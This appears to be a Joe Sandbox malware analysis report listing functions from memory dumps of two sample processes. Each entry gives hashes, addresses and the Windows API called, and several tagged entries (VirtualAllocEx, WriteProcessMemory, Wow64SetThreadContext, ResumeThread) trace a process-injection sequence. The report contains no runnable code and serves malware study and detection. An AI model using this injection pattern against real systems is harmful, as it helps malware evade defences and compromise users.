Instruction ID: b4c3440cb7e2f9a3a2432ac047e6551d94bc81c69e198b5915cac05bd8761672
Opcode Fuzzy Hash: 9d16a353aabd845504cde2314d49a0d743dfd0cb088d9b04c9e1a7433755010a
Instruction Fuzzy Hash: DF113AB5900249DFDB20DFA9C8447EEBFF5EF48314F14882AE519A7250C7399955CFA0

Function 077B6870 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 077B68DE

Memory Dump Source

Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 206ecf6ea70349434c67a35253476685bf86552fb4e1ff2e2a24f007d97d449b
Instruction ID: 6bef020dd4e7c3d148166cd24085c1928d4b32d2b6ac00fb05dab647ad4d109c
Opcode Fuzzy Hash: 206ecf6ea70349434c67a35253476685bf86552fb4e1ff2e2a24f007d97d449b
Instruction Fuzzy Hash: B61126B5800249DFCB20DFAAC844AEEBBF5EF48310F108829E519A7250CB79A540CBA0

Function 077B62B0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 077B6312

Memory Dump Source

Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d31a5d5c431bb9a19dbd970457281384891e1523da4cdb165af0117b777ca997
Instruction ID: 93b0ec61c9facdcd6204d2da0b0a5c2b462fff3b159b09bd24bc5cc6a457bc94
Opcode Fuzzy Hash: d31a5d5c431bb9a19dbd970457281384891e1523da4cdb165af0117b777ca997
Instruction Fuzzy Hash: DD1136B1D003498FDB20DFAAC4457EEFBF5EF88324F208819D519A7240CB79A944CBA0

Function 077B3400 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 077BAFA5

Memory Dump Source

Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 7c15ea48cccd1ac94002bbbbc2f1393042b19f19019979d6705d1522613439d5
Instruction ID: 5d2fbdf35f5c778b2511f0860e9b3d6b1534ff2cc9c44e4f21d19f123919d755
Opcode Fuzzy Hash: 7c15ea48cccd1ac94002bbbbc2f1393042b19f19019979d6705d1522613439d5
Instruction Fuzzy Hash: 201103B5800349DFDB20DF9AC488BDEFBF8EB48310F10845AE918A7200C379A944CFA1

Function 013CB3B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 013CB41E

Memory Dump Source

Source File: 00000000.00000002.2063264488.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_YvVDV4cbjy.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6b166d704646f1657ade028b9e68af28f904eb6c6565ac3868fdb30bf5f3f154
Instruction ID: 914eed030531bbabe6cd6dd46a6c82d8e2c348c89e1fdd8be43c7a20ce938f3a
Opcode Fuzzy Hash: 6b166d704646f1657ade028b9e68af28f904eb6c6565ac3868fdb30bf5f3f154
Instruction Fuzzy Hash: 4F1110B5C002498FDB10DF9AD444ADEFBF8EF88714F10841AD519B7214C379A545CFA1

Function 0136D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062860498.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_136d000_YvVDV4cbjy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00c0525d6b6d75578dc328f807663ee2597f4ab5d96e679103e8e0c7fa228969
Instruction ID: 5523a0c00389ef84ed33c728122a9eb305d5d3e13151d1ff586cb58e98102a23
Opcode Fuzzy Hash: 00c0525d6b6d75578dc328f807663ee2597f4ab5d96e679103e8e0c7fa228969
Instruction Fuzzy Hash: 3C214871200244DFDB06DF58D9C0F56BF6DFB98318F20C169D9491B25AC73AE816C7A1

Function 0137D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062979337.000000000137D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0137D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_137d000_YvVDV4cbjy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03e14d3c2e5a96d520bc961ceef3c72a86e6c593c58836f85a0693c915dc1896
Instruction ID: 7a0fb1cd61b50b0280a9e6f1256f29ff5f8095368de39948ff31881d8c68ca93
Opcode Fuzzy Hash: 03e14d3c2e5a96d520bc961ceef3c72a86e6c593c58836f85a0693c915dc1896
Instruction Fuzzy Hash: 7A21F571604204DFDB25DF98D5C0B26BB65FF84328F24C56DD9494B256C33ED407CA61

Function 0137D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062979337.000000000137D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0137D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_137d000_YvVDV4cbjy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9887e417ffb61b68698665632e8171d5b36e35b144686ce566c46d05094b8b93
Instruction ID: 375dedf31a563e5e4581c60960235072a1c26f71c3874dc21cbadb92ba89b9e5
Opcode Fuzzy Hash: 9887e417ffb61b68698665632e8171d5b36e35b144686ce566c46d05094b8b93
Instruction Fuzzy Hash: A8210071604204DFCB26DF68D980B26BFA9FF88318F20C56DD90A0B256C33ED406CA61

Function 0137D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062979337.000000000137D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0137D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_137d000_YvVDV4cbjy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b595ff58d56e28363035bf502b84b8d57bf879c3a6cf6435799c7c1b133d988
Instruction ID: 57de29a8492948793a4589566f5df037ea4212d36c1e9805858282d3f74b0bf1
Opcode Fuzzy Hash: 9b595ff58d56e28363035bf502b84b8d57bf879c3a6cf6435799c7c1b133d988
Instruction Fuzzy Hash: 8A216F755093808FDB13CF64D994715BF71EF46218F28C5EAD8498F6A7C33A980ACB62

Function 0136D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062860498.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_136d000_YvVDV4cbjy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 0ccd92be3b2db37e53e85d90ba3ce4bbae5d623437e3cc801333df9460f402a3
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: 9911E172504240CFDB02CF44D5C4B56BF71FB88324F24C6A9D9490B25BC33AE85ACBA2

Function 0137D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062979337.000000000137D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0137D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_137d000_YvVDV4cbjy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: 4dceb4eadb7237492a726d93b80aa62521879b5a56c4eb73da81259a5fdc7781
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: AF11BB75504280DFDB12CF54C5C4B15BFB1FF84228F28C6ADD9494B296C33AD40ACB62

Function 0136D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062860498.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_136d000_YvVDV4cbjy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40bc623848d733b1e800acb96b447df11e12ecb5d2d9d272a84c07512f1dfb61
Instruction ID: 8719bae918d1613a5ca2f90524956975ce717ef309c4d39dd90ae87d3583b59f
Opcode Fuzzy Hash: 40bc623848d733b1e800acb96b447df11e12ecb5d2d9d272a84c07512f1dfb61
Instruction Fuzzy Hash: 45012B31204384DAE7209F99CD84B67FF9CEF45328F18C52AED490A28AC27D9800CA72

Function 0136D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062860498.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_136d000_YvVDV4cbjy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c52b16560d27c159d0fa4f6814fcd05837ef0a183e1234ecec17cc3e1f8a28c3
Instruction ID: 51f60e4322eb3eb38ce4af3e5d13f5f01b4374c95fefd0c59ee601d22ef162a5
Opcode Fuzzy Hash: c52b16560d27c159d0fa4f6814fcd05837ef0a183e1234ecec17cc3e1f8a28c3
Instruction Fuzzy Hash: CCF062715043849EE7119E1AD888B62FFACEF85634F18C45AED485A29AC2799844CAB1

Non-executed Functions

Function 077BCBE8 Relevance: .4, Instructions: 363COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac0a088747121b4756147b6b438b149d5922b0a027a80ca7e9ba2d8182a9b3bd
Instruction ID: 3da54dfb1608b2c02cdca2772c06364cc5a9a86926b125617f132f86b14a1538
Opcode Fuzzy Hash: ac0a088747121b4756147b6b438b149d5922b0a027a80ca7e9ba2d8182a9b3bd
Instruction Fuzzy Hash: 13D1C1B17017058FDB26DB79C4647AEB7FAAF88744F14886DD106DB290DB34E902CBA1

Function 077B5650 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0be77c0cb41019c8afc873c0542104db9bae3136b4f7bb9ecde9d22e3fb66d38
Instruction ID: f2e20931f817ae6aabd0a836d5b3f6ecd3091aee08dcc6add8d3fb43b54867c0
Opcode Fuzzy Hash: 0be77c0cb41019c8afc873c0542104db9bae3136b4f7bb9ecde9d22e3fb66d38
Instruction Fuzzy Hash: B4E1F9B4E001198FCB14DFA9C580AAEFBF2FF89345F248169D415AB35AD731A941CF61

Function 077B3D98 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32baaf7840290f66db0b2241fdddfcdb401442c098b42deafc862681f9e8265d
Instruction ID: 651b15b43b5d733a50d0223636c3807114fff9acb86067680a8195fa34197df4
Opcode Fuzzy Hash: 32baaf7840290f66db0b2241fdddfcdb401442c098b42deafc862681f9e8265d
Instruction Fuzzy Hash: CBE11BB4E001598FCB14DFA9C580AAEFBF2FF89345F248169E415AB35AD730A941CF61

Function 077B6438 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b96af90d2df159951b503231805acf4d53707ae8647292f88a7d660c794ce2
Instruction ID: 854c38d782cd17424133304fb8a11f780960ce5d4f0862490c47f2392168782c
Opcode Fuzzy Hash: a4b96af90d2df159951b503231805acf4d53707ae8647292f88a7d660c794ce2
Instruction Fuzzy Hash: 1DE119B4E001198FCB14DFA9C580AAEFBB2FF89345F248169E515AB35AD731A941CF60

Function 077B5A88 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07858e54ae7de476f91ac400513a7c5a48617d6e866e7fd013d56208e0f289b2
Instruction ID: a71f768b00ad1c7d517ce6bb39687aec240480ce154451ae2d55dc545725241e
Opcode Fuzzy Hash: 07858e54ae7de476f91ac400513a7c5a48617d6e866e7fd013d56208e0f289b2
Instruction Fuzzy Hash: 21E10BB4E002198FCB14DFA9C580AAEFBB2FF89345F648169D415AB35AD730A941CF61

Function 077B41D0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eac67035fdfae1a9b48464f408a8b93901d697f36c3568b12781f2f949aa3864
Instruction ID: 518282996d22d511d3596d7d5defd4e68d6e05b49d5c4f2d7e96d6c7d4a15db4
Opcode Fuzzy Hash: eac67035fdfae1a9b48464f408a8b93901d697f36c3568b12781f2f949aa3864
Instruction Fuzzy Hash: CDE1FCB4E001598FCB14DFA9C580AAEFBF2FF89345F248169E815A735AD730A941CF61

Function 013CDFB4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2063264488.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_YvVDV4cbjy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a03413407951047299ce28a52ac06e41ed80a157379157dbfc28709ebdc8b55
Instruction ID: 26a97448c60848d8c66e3d27ca48ade4be19fd5d3524ee4dde068674a8f58703
Opcode Fuzzy Hash: 4a03413407951047299ce28a52ac06e41ed80a157379157dbfc28709ebdc8b55
Instruction Fuzzy Hash: CFA14D32E002198FCF09DFB9C84459EBBB6FF84704B15856EE905AB265DB31ED15CB80

Function 077B9D59 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1347fc7052956e9c93f37134c84c49a086beb767ba784e9d799b3b073cd55776
Instruction ID: 26fc9e188a94a8d6188a39555022b9f6eb1138e2a6c02bbe675e6501ff7ec8d6
Opcode Fuzzy Hash: 1347fc7052956e9c93f37134c84c49a086beb767ba784e9d799b3b073cd55776
Instruction Fuzzy Hash: 3121C9B1D09628CBEB68CF6BC8043D9FAF7AFC9350F04C0AAC61CA6255DB341685CE01

Analysis Process: HxQXdrrQ.exePID: 1632, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	234
Total number of Limit Nodes:	15

Executed Functions

Function 06F96BAC Relevance: 1.7, APIs: 1, Instructions: 249
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F96DEE

Memory Dump Source

Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d0e7d8f5907427110fb7d97f3a43885c00bdb0482738c7fae2dacd3d67d661fc
Instruction ID: de72953c6c4c7f43289bd149f1a4cd0c1e3bccc5b8057ac03a918fd9f083b4d2
Opcode Fuzzy Hash: d0e7d8f5907427110fb7d97f3a43885c00bdb0482738c7fae2dacd3d67d661fc
Instruction Fuzzy Hash: 28A15871D002198FEF64DF69C9417AEBBB2FF48304F14856AE818E7280DB759985CFA1

Function 06F96BB8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F96DEE

Memory Dump Source

Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 64997946fe363c443e6b8c5772de02605e8729d6b0507925af13cf8130f7c0be
Instruction ID: afbd9a067f9eac1e511a08f5d5c9738d2878f82b76216353a5c2a38ae4b58b25
Opcode Fuzzy Hash: 64997946fe363c443e6b8c5772de02605e8729d6b0507925af13cf8130f7c0be
Instruction Fuzzy Hash: 96914771D002198FEF64DF69C941BADBBB2BF48304F14856AE818E7240DB759985CFA1

Function 00D9B1C8 Relevance: 1.7, APIs: 1, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00D9B41E

Memory Dump Source

Source File: 0000000A.00000002.2109322857.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_d90000_HxQXdrrQ.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 68d26b32491163db3b144a3302aa364860c44ed17d76ad941aae5873d1ccc7a5
Instruction ID: 6e82ee2d5089fd1123cc461404080b831885b04bcdb69877c73fc71612a35269
Opcode Fuzzy Hash: 68d26b32491163db3b144a3302aa364860c44ed17d76ad941aae5873d1ccc7a5
Instruction Fuzzy Hash: 9C714870A00B058FDB24DF6AE14575ABBF1FF88314F04892ED48AD7A50DB35E945CBA4

Function 071F2E50 Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.2117086589.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_71f0000_HxQXdrrQ.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: e2c48945bf053e3b09e6e28349f3438f309d619cc8d84467b52b72c776d4cc5f
Instruction ID: a689fd7075440006255ad2fce922dd560903771548312e8440b9cd59d89b667c
Opcode Fuzzy Hash: e2c48945bf053e3b09e6e28349f3438f309d619cc8d84467b52b72c776d4cc5f
Instruction Fuzzy Hash: 2231B0B58053899FCB12DFA9D844ADEBFF4EF0A310F14809AE954A7262C3359854CBA1

Function 00D95A84 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.2109322857.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_d90000_HxQXdrrQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13d93461fd3302ee3105020d8bc4714a81bd386800d6bf4b654ec3b8ed489357
Instruction ID: 80b90cca31e4c320b354e5addc283f2499ab75f0e4238cdff0c058f2b7f64219
Opcode Fuzzy Hash: 13d93461fd3302ee3105020d8bc4714a81bd386800d6bf4b654ec3b8ed489357
Instruction Fuzzy Hash: A9310171804A48CFDF12CFA8D8457EDBBB1EF45314F1482AAC009AB259C776A94ACF21

Function 00D944B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00D959C9

Memory Dump Source

Source File: 0000000A.00000002.2109322857.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_d90000_HxQXdrrQ.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 5cbae6058b0a3697d85ed931c8f6b0bb8b6946b5d1986a6f248534eaa1720110
Instruction ID: 4fa4a8e9ca5f2e6669390d844b913b2849f6efc4e8b4673d772d398746ab90de
Opcode Fuzzy Hash: 5cbae6058b0a3697d85ed931c8f6b0bb8b6946b5d1986a6f248534eaa1720110
Instruction Fuzzy Hash: BD41F2B0C0071DCBDB25DFAAC884B9DBBF6BF48304F20806AD408AB255DB756945CFA0

Function 00D9590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00D959C9

Memory Dump Source

Source File: 0000000A.00000002.2109322857.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_d90000_HxQXdrrQ.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 05541f839a20a458c57c1576d87ebb6b8fe518cb8cf5632a2540971760ae0533
Instruction ID: 31d0b27d74c22c1fc1dce3a6a7e6244d0f3608a22c5651ec804264e7ee0db0c6
Opcode Fuzzy Hash: 05541f839a20a458c57c1576d87ebb6b8fe518cb8cf5632a2540971760ae0533
Instruction Fuzzy Hash: 8641F2B0C00719CBDF25DFA9C884BDDBBB6BF49304F20816AD408AB255DB756946CF90

Function 06F96929 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F969C0

Memory Dump Source

Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: fea165436675405a94e0df1a7b5e9bfcc4947c3fa828c467d6d9f834bfe9c256
Instruction ID: 88f549542d4672f480b35279dba6b70ff27d951eeaffd97cdf90492ff6a1c022
Opcode Fuzzy Hash: fea165436675405a94e0df1a7b5e9bfcc4947c3fa828c467d6d9f834bfe9c256
Instruction Fuzzy Hash: 5B2124B1D003599FDB10DFAAC885BEEBBF5FF48310F10842AE959A7250D7789954CBA0

Function 06F96930 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F969C0

Memory Dump Source

Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a5795d55cff2ccc920b9af54edd2e943945e150462a2ce3dfc95f7f51cc87fe1
Instruction ID: cbc54c9a7dd9ce50829a6be73166898ad1c14124299fad6a54b18bac0761c394
Opcode Fuzzy Hash: a5795d55cff2ccc920b9af54edd2e943945e150462a2ce3dfc95f7f51cc87fe1
Instruction Fuzzy Hash: 032124B1D003499FDB10DFAAC885BEEBBF5FF48310F10842AE959A7250C7789944CBA0

Function 06F96A19 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F96AA0

Memory Dump Source

Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 5cc87a34ab0376809381b576119ca0343efce454156f79a87664242abf934763
Instruction ID: e3adf086c96bd5b5edfc39881816a7b1ebe22068ddf628873ecead990ab11252
Opcode Fuzzy Hash: 5cc87a34ab0376809381b576119ca0343efce454156f79a87664242abf934763
Instruction Fuzzy Hash: 8C2148B1C003599FDB10DFAAC980AEEFBF5FF48310F10842AE919A7250C7389944CBA0

Function 06F96359 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F963DE

Memory Dump Source

Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c4f8ad059bcd872959bdeca0661db0da3c4ba3134d3c1abe342cab9def397746
Instruction ID: c06755c2dd27d75f52b087c0b74ccb02efdf4808cd46abf6579381ba563ce798
Opcode Fuzzy Hash: c4f8ad059bcd872959bdeca0661db0da3c4ba3134d3c1abe342cab9def397746
Instruction Fuzzy Hash: 392125B1D002098FEB10DFAAC485BAEBBF4EF48314F108429E559A7241CB78A945CBA0

Function 00D9B0B4 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00D9D66E,?,?,?,?,?), ref: 00D9D72F

Memory Dump Source

Source File: 0000000A.00000002.2109322857.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_d90000_HxQXdrrQ.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 610ae58b890a1d4b739a60d0e4fb948e305cd3d984583e8504ef3b33ed0777a6
Instruction ID: e1d3b8aa791a5e0bf3685c5e41996ba44027a80865f10801ec9e69e371074616
Opcode Fuzzy Hash: 610ae58b890a1d4b739a60d0e4fb948e305cd3d984583e8504ef3b33ed0777a6
Instruction Fuzzy Hash: 5E21E5B59002489FDB10DF9AD584AEEFBF9EB48310F14801AE919A7350D379A944CFA4

Function 06F96A20 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F96AA0

Memory Dump Source

Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: a2a725fddc992358d0bfaf014a8057b2ef7ce04276cce47908f13e0afa96b25f
Instruction ID: 33c497d66b29507edd8d84f39490e25220dba4164090825d0501a93591e91d75
Opcode Fuzzy Hash: a2a725fddc992358d0bfaf014a8057b2ef7ce04276cce47908f13e0afa96b25f
Instruction Fuzzy Hash: 062125B1C002599FDB10DFAAC980AEEFBF5FF48310F10842AE919A7250C7389944CBA0

Function 06F96360 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F963DE

Memory Dump Source

Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd

Similarity

API ID: ContextThreadWow64
